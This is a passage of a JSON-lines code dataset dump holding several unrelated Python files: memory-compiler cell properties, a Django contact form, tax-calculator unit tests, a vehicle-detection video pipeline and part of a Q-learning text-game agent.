self.custom_type_list = custom_type_list\n self.clk_pin = clk_pin\n\nclass _dff_buff:\n def __init__(self, use_custom_ports, custom_buff_ports, add_body_contacts):\n self.use_custom_ports = use_custom_ports\n self.buf_ports = custom_buff_ports\n self.add_body_contacts = add_body_contacts\n\nclass _dff_buff_array:\n def __init__(self, use_custom_ports, add_body_contacts):\n self.use_custom_ports = use_custom_ports\n self.add_body_contacts = add_body_contacts\n\nclass _bitcell_array:\n def __init__(self, use_custom_cell_arrangement):\n self.use_custom_cell_arrangement = use_custom_cell_arrangement\n\nclass cell_properties():\n \"\"\"\n This contains meta information about the custom designed cells. For\n instance, pin names, or the axis on which they need to be mirrored. These\n can be overriden in the tech.py file.\n \"\"\"\n def __init__(self):\n self.names = {}\n\n self._bitcell = _bitcell._default()\n \n self._dff = _dff(use_custom_ports = False,\n custom_port_list = [\"D\", \"Q\", \"clk\", \"vdd\", \"gnd\"],\n custom_type_list = [\"INPUT\", \"OUTPUT\", \"INPUT\", \"POWER\", \"GROUND\"],\n clk_pin= \"clk\")\n \n self._dff_buff = _dff_buff(use_custom_ports = False,\n custom_buff_ports = [\"D\", \"qint\", \"clk\", \"vdd\", \"gnd\"],\n add_body_contacts = False)\n\n self._dff_buff_array = _dff_buff_array(use_custom_ports = False,\n add_body_contacts = False)\n\n self._write_driver = _cell({'din': 'din',\n 'bl' : 'bl',\n 'br' : 'br',\n 'en' : 'en'})\n\n self._sense_amp = _cell({'bl' : 'bl',\n 'br' : 'br',\n 'dout' : 'dout',\n 'en' : 'en'})\n\n self._bitcell_array = _bitcell_array(use_custom_cell_arrangement = [])\n\n @property\n def bitcell(self):\n return self._bitcell\n\n @property\n def dff(self):\n return self._dff\n \n @property\n def dff_buff(self):\n return self._dff_buff\n\n @property\n def dff_buff_array(self):\n return self._dff_buff_array\n\n @property\n def write_driver(self):\n return self._write_driver\n\n @property\n def sense_amp(self):\n return self._sense_amp\n \n @property\n def bitcell_array(self):\n return self._bitcell_array\n\n def compare_ports(self, port_list):\n use_custom_arrangement = False\n for ports in port_list:\n if ports == \"{}R_{}W_{}RW\".format(OPTS.num_r_ports, OPTS.num_w_ports, OPTS.num_rw_ports):\n use_custom_arrangement = True\n break\n return use_custom_arrangement\n","sub_path":"compiler/base/custom_cell_properties.py","file_name":"custom_cell_properties.py","file_ext":"py","file_size_in_byte":5651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"69975090","text":"# -*- coding: utf-8 -*-\nfrom django import forms\nfrom django.core.mail import EmailMessage\n\n\nclass ContatoForm(forms.Form):\n\n nome = forms.CharField(label='Nome')\n email = forms.EmailField(label='E-mail')\n assunto = forms.CharField(label='Assunto', min_length=10)\n mensagem = forms.CharField(label='Mensagem', widget=forms.Textarea())\n\n def send_mail(self):\n to = ['oliveira.matheusde@gmail.com']\n subject = 'Enviado Pelo Website'\n values = self.cleaned_data\n\n body = \"\"\"\n \n \n \n WebVerde\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n
WebVerde\n        Nome: {nome}\n        E-mail: {email}\n        Assunto: {assunto}\n        Mensagem: {mensagem}
\n \n \n \"\"\".format(nome=values['nome'], email=values['email'],\n assunto=values['assunto'], mensagem=values['mensagem'])\n\n # EmailMessage(subject, body, values['email'], [to])\n teste = EmailMessage(subject, body, to=to)\n teste.content_subtype = 'html'\n teste.send()\n","sub_path":"core/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"546877097","text":"import os\nimport sys\nimport json\nCUR_PATH = os.path.abspath(os.path.dirname(__file__))\nsys.path.append(os.path.join(CUR_PATH, \"../../\"))\nimport numpy as np\nfrom numpy.testing import assert_array_equal\nimport pandas as pd\nimport tempfile\nimport pytest\nfrom taxcalc import Policy, Records, Calculator\nfrom taxcalc import create_distribution_table, create_difference_table\n\n\n# use 1991 PUF-like data to emulate current PUF, which is private\nTAX_DTA_PATH = os.path.join(CUR_PATH, '../../tax_all1991_puf.gz')\nTAX_DTA = pd.read_csv(TAX_DTA_PATH, compression='gzip')\n# PUF-fix-up: MIdR needs to be type int64 to match PUF\nTAX_DTA['MIDR'] = TAX_DTA['MIDR'].astype('int64')\n# specify WEIGHTS appropriate for 1991 data\nWEIGHTS_FILENAME = '../../WEIGHTS_testing.csv'\nWEIGHTS_PATH = os.path.join(CUR_PATH, WEIGHTS_FILENAME)\nWEIGHTS = pd.read_csv(WEIGHTS_PATH)\n\nIRATES = {1991: 0.015, 1992: 0.020, 1993: 0.022, 1994: 0.020, 1995: 0.021,\n 1996: 0.022, 1997: 0.023, 1998: 0.024, 1999: 0.024, 2000: 0.024,\n 2001: 0.024, 2002: 0.024, 2003: 0.024, 2004: 0.024}\n\nWRATES = {1991: 0.0276, 1992: 0.0419, 1993: 0.0465, 1994: 0.0498,\n 1995: 0.0507, 1996: 0.0481, 1997: 0.0451, 1998: 0.0441,\n 1999: 0.0437, 2000: 0.0435, 2001: 0.0430, 2002: 0.0429,\n 2003: 0.0429, 2004: 0.0429}\n\nRAWINPUTFILE_FUNITS = 4\nRAWINPUTFILE_YEAR = 2015\nRAWINPUTFILE_CONTENTS = (\n 'RECID,MARS\\n'\n '1,2\\n'\n '2,1\\n'\n '3,4\\n'\n '4,6\\n'\n)\n\n\n@pytest.yield_fixture\ndef rawinputfile():\n \"\"\"\n Temporary input file that contains minimum required input varaibles.\n \"\"\"\n ifile = tempfile.NamedTemporaryFile(mode='a', delete=False)\n ifile.write(RAWINPUTFILE_CONTENTS)\n ifile.close()\n # must close and then yield for Windows platform\n yield ifile\n if os.path.isfile(ifile.name):\n try:\n os.remove(ifile.name)\n except OSError:\n pass # sometimes we can't remove a generated temporary file\n\n\n@pytest.yield_fixture\ndef policyfile():\n txt = \"\"\"{\"_almdep\": {\"value\": [7150, 7250, 7400]},\n \"_almsep\": {\"value\": [40400, 41050]},\n \"_rt5\": {\"value\": [0.33 ]},\n \"_rt7\": {\"value\": [0.396]}}\"\"\"\n f = tempfile.NamedTemporaryFile(mode=\"a\", delete=False)\n f.write(txt + \"\\n\")\n f.close()\n # Must close and then yield for Windows platform\n yield f\n os.remove(f.name)\n\n\ndef run():\n parm = Policy()\n assert parm.current_year == 2013\n recs = Records(data=TAX_DTA, weights=WEIGHTS, start_year=2009)\n calc = Calculator(policy=parm, records=recs)\n assert calc.current_year == 2013\n calc.calc_all()\n rshape = calc.records.e00100.shape\n totaldf = pd.DataFrame()\n for attr in dir(calc.records):\n value = getattr(calc.records, attr)\n if hasattr(value, \"shape\"):\n if value.shape == rshape:\n totaldf[attr] = value\n Col_names = ['EICYB1', 'EICYB2', 'EICYB3', 'NIIT', '_addamt', '_addtax',\n '_agep', '_ages', '_agierr', '_alminc', '_amed', '_amt15pc',\n '_amt20pc', '_amt25pc', '_amt5pc', '_amtfei', '_amtsepadd',\n '_amtstd', '_avail', '_cglong', '_cmbtp', '_comb',\n '_combined', '_ctc1', '_ctc2', '_ctcagi', '_ctctax', 
'_dclim',\n '_dwks12', '_dwks16', '_dwks17', '_dwks21', '_dwks25',\n '_dwks26', '_dwks28', '_dwks31', '_dwks5', '_dwks9', '_dy',\n '_earned', '_eitc', '_exocrd', '_expanded_income', '_feided',\n '_feitax', '_fica', '_hasgain', '_ieic', 'c03260',\n '_limitratio', '_line17', '_line19', '_line22', '_line30',\n '_line31', '_line32', '_line33', '_line34', '_line35',\n '_line36', '_modagi', '_nctcr', '_ncu13', '_ngamty', '_noncg',\n '_nonlimited', '_num', '_numextra', '_oldfei', '_othadd',\n '_othded', '_othertax', '_othtax', '_parents', '_phase2_i',\n '_posagi', '_precrd', '_preeitc', '_prexmp', '_refund',\n '_regcrd', '_s1291', '_sep', '_sey', 'c09400', 'c03260',\n '_seywage', '_standard', '_statax', '_tamt2', '_taxbc',\n '_taxinc', '_taxspecial', '_tratio', '_txpyers',\n '_val_rtbase', '_val_rtless', '_val_ymax', '_xyztax', '_ymod',\n '_ymod1', '_ymod2', '_ymod3', '_ywossbc', '_ywossbe',\n 'c00100', 'c01000', 'c02500', 'c02650', 'c02700', 'c02900',\n 'c04100', 'c04200', 'c04470', 'c04500', 'c04600', 'c04800',\n 'c05100', 'c05200', 'c05700', 'c05750', 'c05800', 'c07100',\n 'c07150', 'c07180', 'c07220', 'c07230', 'c07240', 'c07300',\n 'c07600', 'c07970', 'c08795', 'c08800', 'c09200', 'c09600',\n 'c10300', 'c10950', 'c10960', 'c11055', 'c11070', 'c15100',\n 'c15200', 'c17000', 'c17750', 'c18300', 'c19200', 'c19700',\n 'c20400', 'c20500', 'c20750', 'c20800', 'c21040', 'c21060',\n 'c23650', 'c24505', 'c24510', 'c24516', 'c24517', 'c24520',\n 'c24530', 'c24534', 'c24540', 'c24550', 'c24560', 'c24570',\n 'c24580', 'c24597', 'c24598', 'c24610', 'c24615', 'c32800',\n 'c32840', 'c32880', 'c32890', 'c33000', 'c33200', 'c33400',\n 'c33465', 'c33470', 'c33475', 'c33480', 'c37703', 'c59430',\n 'c59450', 'c59460', 'c59485', 'c59490', 'c59560', 'c59660',\n 'c59680', 'c59700', 'c59720', 'c60000', 'c60130', 'c60200',\n 'c60220', 'c60240', 'c60260', 'c62100', 'c62100_everyone',\n 'c62600', 'c62700', 'c62720', 'c62730', 'c62740', 'c62745',\n 'c62747', 'c62755', 'c62760', 'c62770', 'c62780', 'c62800',\n 'c62900', 'c63000', 'c63100', 'c82880', 'c82885', 'c82890',\n 'c82900', 'c82905', 'c82910', 'c82915', 'c82920', 'c82925',\n 'c82930', 'c82935', 'c82937', 'c82940', 'c87482', 'c87483',\n 'c87487', 'c87488', 'c87492', 'c87493', 'c87497', 'c87498',\n 'c87521', 'c87530', 'c87540', 'c87550', 'c87560', 'c87570',\n 'c87580', 'c87590', 'c87600', 'c87610', 'c87620', 'c87654',\n 'c87656', 'c87658', 'c87660', 'c87662', 'c87664', 'c87666',\n 'c87668', 'c87681', 'e00650', 'e02500', 'e08795', 'h82880',\n 'x04500', 'x07100', 'y07100', 'y62745']\n df = totaldf[Col_names]\n exp_results_file = os.path.join(CUR_PATH, '../../exp_results.csv.gz')\n exp_results = pd.read_csv(exp_results_file, compression='gzip')\n exp_set = set(exp_results.columns) # fix-up to bad colname in exp_results\n cur_set = set(df.columns)\n assert exp_set == cur_set\n for label in exp_results.columns:\n lhs = exp_results[label].values.reshape(len(exp_results))\n rhs = totaldf[label].values.reshape(len(exp_results))\n res = np.allclose(lhs, rhs, atol=1e-02)\n if not res:\n print('Problem found in: ', label)\n\n\ndef test_sequence():\n run()\n\n\ndef test_make_Calculator():\n parm = Policy()\n assert parm.current_year == 2013\n recs = Records(data=TAX_DTA, weights=WEIGHTS, start_year=2009)\n calc = Calculator(policy=parm, records=recs)\n assert calc.current_year == 2013\n\n\ndef test_make_Calculator_deepcopy():\n import copy\n parm = Policy()\n recs = Records(data=TAX_DTA, weights=WEIGHTS, start_year=2009)\n calc1 = Calculator(policy=parm, records=recs)\n calc2 
= copy.deepcopy(calc1)\n assert isinstance(calc2, Calculator)\n\n\ndef test_make_Calculator_with_policy_reform():\n # create a Policy object and apply a policy reform\n policy2 = Policy()\n reform2 = {2013: {'_II_em': np.array([4000]), '_II_em_cpi': False,\n '_STD_Aged': [[1600, 1300, 1300, 1600, 1600, 1300]],\n \"_STD_Aged_cpi\": False}}\n policy2.implement_reform(reform2)\n # create a Calculator object using this policy-reform\n puf = Records(data=TAX_DTA, weights=WEIGHTS, start_year=2009)\n calc2 = Calculator(policy=policy2, records=puf)\n # check that Policy object embedded in Calculator object is correct\n assert calc2.current_year == 2013\n assert calc2.policy.II_em == 4000\n assert_array_equal(calc2.policy._II_em,\n np.array([4000] * Policy.DEFAULT_NUM_YEARS))\n exp_STD_Aged = [[1600, 1300, 1300,\n 1600, 1600, 1300]] * Policy.DEFAULT_NUM_YEARS\n assert_array_equal(calc2.policy._STD_Aged, np.array(exp_STD_Aged))\n assert_array_equal(calc2.policy.STD_Aged,\n np.array([1600, 1300, 1300, 1600, 1600, 1300]))\n\n\ndef test_make_Calculator_with_multiyear_reform():\n # create a Policy object and apply a policy reform\n policy3 = Policy()\n reform3 = {2015: {}}\n reform3[2015]['_STD_Aged'] = [[1600, 1300, 1600, 1300, 1600, 1300]]\n reform3[2015]['_II_em'] = [5000, 6000] # reform values for 2015 and 2016\n reform3[2015]['_II_em_cpi'] = False\n policy3.implement_reform(reform3)\n # create a Calculator object using this policy-reform\n puf = Records(data=TAX_DTA, weights=WEIGHTS, start_year=2009)\n calc3 = Calculator(policy=policy3, records=puf)\n # check that Policy object embedded in Calculator object is correct\n assert calc3.current_year == 2013\n assert calc3.policy.II_em == 3900\n assert calc3.policy.num_years == Policy.DEFAULT_NUM_YEARS\n exp_II_em = [3900, 3950, 5000] + [6000] * (Policy.DEFAULT_NUM_YEARS - 3)\n assert_array_equal(calc3.policy._II_em, np.array(exp_II_em))\n calc3.increment_year()\n calc3.increment_year()\n assert calc3.current_year == 2015\n assert_array_equal(calc3.policy.STD_Aged,\n np.array([1600, 1300, 1600, 1300, 1600, 1300]))\n\n\ndef test_make_Calculator_with_reform_after_start_year():\n # create Policy object using custom indexing rates\n irates = {2013: 0.01, 2014: 0.01, 2015: 0.02, 2016: 0.01, 2017: 0.03}\n parm = Policy(start_year=2013, num_years=len(irates),\n inflation_rates=irates)\n # specify reform in 2015, which is two years after Policy start_year\n reform = {2015: {}, 2016: {}}\n reform[2015]['_STD_Aged'] = [[1600, 1300, 1600, 1300, 1600, 1300]]\n reform[2015]['_II_em'] = [5000]\n reform[2016]['_II_em'] = [6000]\n reform[2016]['_II_em_cpi'] = False\n parm.implement_reform(reform)\n recs = Records(data=TAX_DTA, weights=WEIGHTS, start_year=2009)\n calc = Calculator(policy=parm, records=recs)\n # compare actual and expected parameter values over all years\n exp_STD_Aged = np.array([[1500, 1200, 1200, 1500, 1500, 1200],\n [1550, 1200, 1200, 1550, 1550, 1200],\n [1600, 1300, 1600, 1300, 1600, 1300],\n [1632, 1326, 1632, 1326, 1632, 1326],\n [1648, 1339, 1648, 1339, 1648, 1339]])\n exp_II_em = np.array([3900, 3950, 5000, 6000, 6000])\n assert_array_equal(calc.policy._STD_Aged, exp_STD_Aged)\n assert_array_equal(calc.policy._II_em, exp_II_em)\n # compare actual and expected values for 2015\n calc.increment_year()\n calc.increment_year()\n assert calc.current_year == 2015\n exp_2015_II_em = 5000\n assert_array_equal(calc.policy.II_em, exp_2015_II_em)\n exp_2015_STD_Aged = np.array([1600, 1300, 1600, 1300, 1600, 1300])\n assert_array_equal(calc.policy.STD_Aged, 
exp_2015_STD_Aged)\n\n\ndef test_make_Calculator_user_mods_with_cpi_flags(policyfile):\n with open(policyfile.name) as pfile:\n policy = json.load(pfile)\n ppo = Policy(parameter_dict=policy, start_year=1991,\n num_years=len(IRATES), inflation_rates=IRATES,\n wage_growth_rates=WRATES)\n rec = Records(data=TAX_DTA, start_year=1991)\n calc = Calculator(policy=ppo, records=rec)\n user_mods = {1991: {\"_almdep\": [7150, 7250, 7400],\n \"_almdep_cpi\": True,\n \"_almsep\": [40400, 41050],\n \"_almsep_cpi\": False,\n \"_rt5\": [0.33],\n \"_rt7\": [0.396]}}\n calc.policy.implement_reform(user_mods)\n # compare actual and expected values\n inf_rates = [IRATES[1991 + i] for i in range(0, Policy.DEFAULT_NUM_YEARS)]\n exp_almdep = Policy.expand_array(np.array([7150, 7250, 7400]),\n inflate=True,\n inflation_rates=inf_rates,\n num_years=Policy.DEFAULT_NUM_YEARS)\n act_almdep = getattr(calc.policy, '_almdep')\n assert_array_equal(act_almdep, exp_almdep)\n exp_almsep_values = [40400] + [41050] * (Policy.DEFAULT_NUM_YEARS - 1)\n exp_almsep = np.array(exp_almsep_values)\n act_almsep = getattr(calc.policy, '_almsep')\n assert_array_equal(act_almsep, exp_almsep)\n\n\ndef test_make_Calculator_raises_on_no_policy():\n rec = Records(data=TAX_DTA, weights=WEIGHTS, start_year=2013)\n with pytest.raises(ValueError):\n calc = Calculator(records=rec)\n\n\ndef test_Calculator_attr_access_to_policy():\n policy = Policy()\n puf = Records(data=TAX_DTA, weights=WEIGHTS, start_year=2009)\n calc = Calculator(policy=policy, records=puf)\n assert hasattr(calc.records, 'c01000')\n assert hasattr(calc.policy, '_AMT_Child_em')\n assert hasattr(calc, 'policy')\n\n\ndef test_Calculator_create_distribution_table():\n policy = Policy()\n puf = Records(data=TAX_DTA, weights=WEIGHTS, start_year=2009)\n calc = Calculator(policy=policy, records=puf)\n calc.calc_all()\n dist_labels = ['Returns', 'AGI', 'Standard Deduction Filers',\n 'Standard Deduction', 'Itemizers',\n 'Itemized Deduction', 'Personal Exemption',\n 'Taxable Income', 'Regular Tax', 'AMTI', 'AMT Filers',\n 'AMT', 'Tax before Credits', 'Non-refundable Credits',\n 'Tax before Refundable Credits', 'Refundable Credits',\n 'Individual Income Tax Liabilities',\n 'Payroll Tax Liablities',\n 'Combined Payroll and Individual Income Tax Liabilities']\n dt1 = create_distribution_table(calc, groupby=\"weighted_deciles\",\n result_type=\"weighted_sum\")\n dt1.columns = dist_labels\n dt2 = create_distribution_table(calc, groupby=\"small_income_bins\",\n result_type=\"weighted_avg\")\n assert isinstance(dt1, pd.DataFrame)\n assert isinstance(dt2, pd.DataFrame)\n\n\ndef test_Calculator_mtr():\n policy = Policy()\n puf = Records(TAX_DTA, weights=WEIGHTS, start_year=2009)\n calc = Calculator(policy=policy, records=puf)\n (mtr_FICA, mtr_IIT, mtr) = calc.mtr()\n assert type(mtr) == np.ndarray\n assert np.array_equal(mtr, mtr_FICA) is False\n assert np.array_equal(mtr_FICA, mtr_IIT) is False\n\n\ndef test_Calculator_create_difference_table():\n # create current-law Policy object and use to create Calculator calc1\n policy1 = Policy()\n puf1 = Records(data=TAX_DTA, weights=WEIGHTS, start_year=2009)\n calc1 = Calculator(policy=policy1, records=puf1)\n calc1.calc_all()\n # create policy-reform Policy object and use to create Calculator calc2\n policy2 = Policy()\n reform = {2013: {'_II_rt7': [0.45]}}\n policy2.implement_reform(reform)\n puf2 = Records(data=TAX_DTA, weights=WEIGHTS, start_year=2009)\n calc2 = Calculator(policy=policy2, records=puf2)\n # create difference table and check that it 
is a Pandas DataFrame\n dtable = create_difference_table(calc1, calc2, groupby=\"weighted_deciles\")\n assert isinstance(dtable, pd.DataFrame)\n\n\ndef test_Calculator_diagnostic_table():\n policy = Policy()\n puf = Records(data=TAX_DTA, weights=WEIGHTS, start_year=Records.PUF_YEAR)\n calc = Calculator(policy=policy, records=puf)\n calc.diagnostic_table()\n\n\ndef test_Calculator_diagnostic_table_no_mutation():\n policy_x = Policy()\n record_x = Records(data=TAX_DTA, weights=WEIGHTS,\n start_year=Records.PUF_YEAR)\n policy_y = Policy()\n record_y = Records(data=TAX_DTA, weights=WEIGHTS,\n start_year=Records.PUF_YEAR)\n calc_x = Calculator(policy=policy_x, records=record_x)\n calc_y = Calculator(policy=policy_y, records=record_y)\n x_start = calc_x.current_year\n y_start = calc_y.current_year\n calc_y.diagnostic_table(base_calc=calc_x)\n assert calc_y.current_year == y_start\n assert calc_x.current_year == x_start\n\n\ndef test_make_Calculator_increment_years_first():\n # create Policy object with custom indexing rates and policy reform\n irates = {2013: 0.01, 2014: 0.01, 2015: 0.02, 2016: 0.01, 2017: 0.03}\n policy = Policy(start_year=2013, inflation_rates=irates,\n num_years=len(irates))\n reform = {2015: {}, 2016: {}}\n reform[2015]['_STD_Aged'] = [[1600, 1300, 1600, 1300, 1600, 1300]]\n reform[2015]['_II_em'] = [5000]\n reform[2016]['_II_em'] = [6000]\n reform[2016]['_II_em_cpi'] = False\n policy.implement_reform(reform)\n # create Records object by reading 1991 data and saying it is 2009 data\n puf = Records(TAX_DTA, weights=WEIGHTS, start_year=2009)\n # create Calculator object with Policy object as modified by reform\n calc = Calculator(policy=policy, records=puf)\n # compare expected policy parameter values with those embedded in calc\n exp_STD_Aged = np.array([[1500, 1200, 1200, 1500, 1500, 1200],\n [1550, 1200, 1200, 1550, 1550, 1200],\n [1600, 1300, 1600, 1300, 1600, 1300],\n [1632, 1326, 1632, 1326, 1632, 1326],\n [1648, 1339, 1648, 1339, 1648, 1339]])\n exp_II_em = np.array([3900, 3950, 5000, 6000, 6000])\n assert_array_equal(calc.policy._STD_Aged, exp_STD_Aged)\n assert_array_equal(calc.policy._II_em, exp_II_em)\n\n\ndef test_Calculator_using_nonstd_input(rawinputfile):\n # check Calculator handling of raw, non-standard input data with no aging\n policy = Policy()\n policy.set_year(RAWINPUTFILE_YEAR) # set policy params to input data year\n nonpuf = Records(data=rawinputfile.name,\n start_year=RAWINPUTFILE_YEAR, # set raw input data year\n consider_imputations=False) # keeps raw data unchanged\n assert nonpuf.dim == RAWINPUTFILE_FUNITS\n calc = Calculator(policy=policy,\n records=nonpuf,\n sync_years=False) # keeps raw data unchanged\n assert calc.current_year == RAWINPUTFILE_YEAR\n calc.calc_all()\n exp_iitax = np.zeros((nonpuf.dim,))\n assert_array_equal(nonpuf._iitax, exp_iitax)\n mtr_fica, _, _ = calc.mtr(wrt_full_compensation=False)\n exp_mtr_fica = np.zeros((nonpuf.dim,))\n exp_mtr_fica.fill(0.153)\n assert_array_equal(mtr_fica, exp_mtr_fica)\n\n\nclass TaxCalcError(Exception):\n '''I've stripped this down to a simple extension of the basic Exception for\n now. 
We can add functionality later as we see fit.\n '''\n pass\n","sub_path":"taxcalc/tests/test_calculate.py","file_name":"test_calculate.py","file_ext":"py","file_size_in_byte":19008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"340412152","text":"import matplotlib.image as mpimg\nimport sys\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport cv2\nimport glob\nimport time\nfrom sklearn.svm import LinearSVC\nfrom sklearn.preprocessing import StandardScaler\nfrom skimage.feature import hog\nfrom lesson_functions import *\n# NOTE: the next import is only valid for scikit-learn version <= 0.17\n# for scikit-learn >= 0.18 use:\nfrom sklearn.model_selection import train_test_split\n#from sklearn.cross_validation import train_test_split\nfrom skvideo.io import FFmpegWriter\nfrom scipy.ndimage.measurements import label\nfrom Tracker import Tracker\n\n\ncolor_space = 'YCrCb' # Can be RGB, HSV, LUV, HLS, YUV, YCrCb\norient = 9 # HOG orientations\npix_per_cell = 8 # HOG pixels per cell\ncell_per_block = 2 # HOG cells per block\nhog_channel = \"ALL\" # Can be 0, 1, 2, or \"ALL\"\nspatial_size = (32, 32) # Spatial binning dimensions\nhist_bins = 32 # Number of histogram bins\nspatial_feat = True # Spatial features on or off\nhist_feat = True # Histogram features on or off\nhog_feat = True # HOG features on or off\ny_start_stop = [400, 656] # Min and max in y to search in slide_window()\n\nimport pickle\ndist_pickle = pickle.load( open(\"svc_pickle.p\", \"rb\" ) )\nsvc = dist_pickle[\"svc\"]\nX_scaler = dist_pickle[\"scaler\"]\nimage = mpimg.imread(\"testgit.jpg\")\nimage = image.astype(np.float32)/255\ndraw_image = np.copy(image)\n\nvideo = \"project_video.mp4\"\nvideoOut = \"boxes.mp4\"\n\nvidcap = cv2.VideoCapture(video)\nfcount = int(vidcap.get(cv2.CAP_PROP_FRAME_COUNT))\nfourcc = cv2.VideoWriter_fourcc(*'XVID')\nsuccess, img = vidcap.read()\nshape = img.shape\nvidout = FFmpegWriter(videoOut)\nif not success: sys.exit(1)\ni = 0\nfps_avg = []\n\n\ntracker = Tracker()\n\nwhile True:\n i+=1\n img_converted = convert_cv_mpl(img)\n draw_image = np.copy(img)\n t1 = time.time()\n windows = slide_window(img_converted, x_start_stop=[None, None], y_start_stop=y_start_stop, \n xy_windows=[(64,64),(96,96)], xy_overlap=(0.5, 0.5))\n\n hot_windows = search_windows(img_converted, windows, svc, X_scaler, color_space=color_space, \n spatial_size=spatial_size, hist_bins=hist_bins, \n orient=orient, pix_per_cell=pix_per_cell, \n cell_per_block=cell_per_block, \n hog_channel=hog_channel, spatial_feat=spatial_feat, \n hist_feat=hist_feat, hog_feat=hog_feat) \n #img_plot = draw_boxes(draw_image, hot_windows, color=(0, 0, 255), thick=6) \n heat = np.zeros_like(draw_image[:,:,0]).astype(np.float)\n heat = add_heat(heat, hot_windows)\n heat = apply_threshold(heat, 0.5)\n heatmap = np.clip(heat, 0, 255)\n labels = label(heatmap)\n #img_plot = draw_labeled_bboxes(np.copy(draw_image), labels, draw=True)\n boxes = draw_labeled_bboxes(np.copy(draw_image), labels, draw=False)\n for box in boxes:\n xmin = box[0][0]\n xmax = box[1][0]\n ymin = box[0][1]\n ymax = box[1][1]\n centerx = (xmin + xmax)/2\n centery = (ymin + ymax)/2\n frameimg = draw_image[ymin:ymax, xmin:xmax]\n tracker.new_object([centerx, centery], frameimg)\n img_plot = np.copy(draw_image)\n tracker.draw_frames(img_plot)\n \n t2 = time.time()\n fps = 1/(t2-t1)\n fps_avg.append(fps)\n if len(fps_avg) > 200: fps_avg.pop(0)\n fps_print = int(np.mean(fps_avg))\n #cv2.putText(img_plot, \"FPS: 
{}\".format(fps_print), (50,50), cv2.FONT_HERSHEY_SIMPLEX, 1.0, (0,0,255), 3)\n vidout.writeFrame((convert_cv_mpl(img_plot)*255).astype(np.uint8))\n cv2.imshow('img', img_plot)\n #printProgressBar(i, fcount, \"Progress:\", \"({} FPS)\".format(fps_print), length=20)\n if cv2.waitKey(1) & 0xFF == ord('q'): break\n success, img = vidcap.read()\n if not success: break\n\nvidcap.release()\nvidout.close()\ncv2.destroyAllWindows()\n","sub_path":"pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":3883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"329053275","text":"\"\"\"Tabular QL agent\r\n Simple Policy-learning algorithm\r\n In this project, we address the task of learning control policies for text-based games using reinforcement learning.\r\n In these games, all interactions between players and the virtual world are through text.\r\n The current world state is described by elaborate text, and the underlying state is not directly observable.\r\n Players read descriptions of the state and respond with natural language commands to take actions.\r\n\r\n For this project you will conduct experiments on a small Home World, which mimic the environment of a typical house.The world consists of a few rooms, and each room contains a representative object that the player can interact with.\r\n For instance, the kitchen has an apple that the player can eat. The goal of the player is to finish some quest. An example of a quest given to the player in text is You are hungry now .\r\n To complete this quest, the player has to navigate through the house to reach the kitchen and eat the apple.\r\n In this game, the room is hidden from the player, who only receives a description of the underlying room.\r\n At each step, the player read the text describing the current room and the quest, and respond with some command (e.g., eat apple ).\r\n The player then receives some reward that depends on the state and his/her command.\r\n\r\n In order to design an autonomous game player, we will employ a reinforcement learning framework to learn command policies using game rewards as feedback.\r\n Since the state observable to the player is described in text, we have to choose a mechanism that maps text descriptions into vector representations.\r\n\r\n A naive approach is to create a map that assigns a unique index for each text description. -- agent_tabular_ql.py\r\n\r\n However, such approach becomes difficult to implement when the number of textual state descriptions are huge.\r\n An alternative method is to use a bag-of-words representation derived from the text description. 
    However, such an approach becomes difficult to implement when the number of textual state descriptions is huge.\r\n    An alternative method is to use a bag-of-words representation derived from the text description. -- agent_linear.py\r\n\r\n    Deep-learning approach -- agent_dqn.py\r\n\r\n\"\"\"\r\n# https://learning.edx.org/course/course-v1:MITx+6.86x+1T2021/block-v1:MITx+6.86x+1T2021+type@sequential+block@P5_rl/block-v1:MITx+6.86x+1T2021+type@vertical+block@P5_rl-tab3\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom tqdm import tqdm\r\nimport framework\r\nimport utils\r\n\r\nDEBUG = True\r\n\r\nGAMMA = 0.5 # discounted factor\r\nTRAINING_EP = 0.5 # epsilon-greedy parameter for training\r\nTESTING_EP = 0.05 # epsilon-greedy parameter for testing\r\nNUM_RUNS = 10\r\nNUM_EPOCHS = 200\r\nNUM_EPIS_TRAIN = 25 # number of episodes for training at each epoch\r\nNUM_EPIS_TEST = 50 # number of episodes for testing\r\nALPHA = 0.1 # learning rate for training\r\n\r\nACTIONS = framework.get_actions()\r\nOBJECTS = framework.get_objects()\r\nNUM_ACTIONS = len(ACTIONS)\r\nNUM_OBJECTS = len(OBJECTS)\r\n\r\n\r\n# pragma: coderesponse template\r\ndef epsilon_greedy(state_1, state_2, q_func, epsilon):\r\n    \"\"\"Returns an action selected by an epsilon-Greedy exploration policy\r\n\r\n    Note that the Q-learning algorithm does not specify how we should interact in the world so as to learn quickly.\r\n    It merely updates the values based on the experience collected. If we explore randomly, i.e., always select actions at random, we would most likely not get anywhere.\r\n    A better option is to exploit what we have already learned, as summarized by current Q-values.\r\n    A typical exploration strategy is to follow a so-called epsilon-greedy policy: with probability epsilon take a random action out of 𝐶, and with probability 1−epsilon follow the best policy.\r\n    The value of 𝜀 here balances exploration vs exploitation. A large value of 𝜀 means exploring more (randomly), not using much of what we have learned.\r\n    A small 𝜀, on the other hand, will generate experience consistent with the current estimates of Q-values.\r\n\r\n    Args:\r\n        state_1, state_2 (int, int): two indices describing the current state\r\n        q_func (np.ndarray): current Q-function\r\n        epsilon (float): the probability of choosing a random command;\r\n            with probability (1 - epsilon) the best command is chosen.\r\n    Returns:\r\n        (int, int): the indices describing the action/object to take\r\n    \"\"\"\r\n    current_room_index = state_1\r\n    best_action_value = -np.inf # so the greedy branch also works when all Q-values are <= 0\r\n    best_action = None\r\n    (action_index, object_index) = (None, None)\r\n    choice = np.random.choice([0,1], p=[epsilon, 1-epsilon])\r\n\r\n    valid_actions = framework.command_is_valid[current_room_index,...]\r\n    valid_actions = np.argwhere(valid_actions == 1)\r\n    random_actions = []\r\n    for (i,j) in valid_actions:\r\n        random_actions.append((i,j))\r\n        qValue = q_func[state_1, state_2, i, j]\r\n        if 